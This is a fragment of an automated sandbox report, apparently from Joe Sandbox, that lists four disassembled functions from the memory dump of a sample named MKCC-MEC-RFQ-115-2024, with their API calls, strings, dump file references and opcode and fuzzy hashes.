                                              • Instruction Fuzzy Hash: C8E0D8792483057FF6251A61EC8AE97371CEB4C761F120039F300550B0EFE28C906520
                                              Function 001451CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ClassName_wcscmp
                                              • String ID: #32770
                                              • API String ID: 2292705959-463685578
                                              • Opcode ID: 78c638cf9bc3df551e83e05eac72a4b5f15d9ffe6ce303ae0c1564ccb89d6810
                                              • Instruction ID: 5ac208d4a525e154a90540d7279cf8a527af49aef7e7a4b37aa709dd7810a7a8
                                              • Opcode Fuzzy Hash: 78c638cf9bc3df551e83e05eac72a4b5f15d9ffe6ce303ae0c1564ccb89d6810
                                              • Instruction Fuzzy Hash: 71E0617290432C27D7109795AC05F97F7ACEF41731F00005BFD10D3050D6A09A4587E0
                                              Function 001381BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 001381CA
                                                • Part of subcall function 00103598: _doexit.LIBCMT ref: 001035A2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Message_doexit
                                              • String ID: AutoIt$Error allocating memory.
                                              • API String ID: 1993061046-4017498283
                                              • Opcode ID: 519a18cebb3c457540258815e2c9ba44f0df4a7b102856d88fe3a32c018a6c43
                                              • Instruction ID: cdbbc7bb7b584ca13204ca5060132ac5153ffa10e2a47a44ac5ccbbe51e22b4d
                                              • Opcode Fuzzy Hash: 519a18cebb3c457540258815e2c9ba44f0df4a7b102856d88fe3a32c018a6c43
                                              • Instruction Fuzzy Hash: 71D02B323C431836D21133E96D0BFC535484B19B11F004026FB88554E38FD144C242DC
                                              Function 0011B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0011B564: _memset.LIBCMT ref: 0011B571
                                                • Part of subcall function 00100B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0011B540,?,?,?,000E100A), ref: 00100B89
                                              • IsDebuggerPresent.KERNEL32(?,?,?,000E100A), ref: 0011B544
                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,000E100A), ref: 0011B553
                                              Strings
                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0011B54E
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                              • API String ID: 3158253471-631824599
                                              • Opcode ID: bb738823e68a40fa5e4f690e7de25a8fa09373caec01acdcf67bc7cfc2deb473
                                              • Instruction ID: 17a99a1901381cba510e20bdd088d35e1c4af052322a5949426bdfc9a3547f0f
                                              • Opcode Fuzzy Hash: bb738823e68a40fa5e4f690e7de25a8fa09373caec01acdcf67bc7cfc2deb473
                                              • Instruction Fuzzy Hash: B9E06D742047518FD365EF28E9443827BE0EB04704F04893DE486C2B50D7F4D584CFA1
                                              Function 001398BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 001398CB
                                              • SendMessageW.USER32(00000000,00001200,00000000,00000000), ref: 001398D9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: @U=u
                                              • API String ID: 3850602802-2594219639
                                              • Opcode ID: d731ba7b1b40da59e558d4d01a314e337a828414e281167d03a446cdbdb889fc
                                              • Instruction ID: c4357ca083d5b7dcc208c645985f79d2ebab27dc4312bb7cc09c9e4435f51d15
                                              • Opcode Fuzzy Hash: d731ba7b1b40da59e558d4d01a314e337a828414e281167d03a446cdbdb889fc
                                              • Instruction Fuzzy Hash: E0C00271145180BAEA211B77FC0DD873E3DE7CAF52B12016CB221954B586A50096D634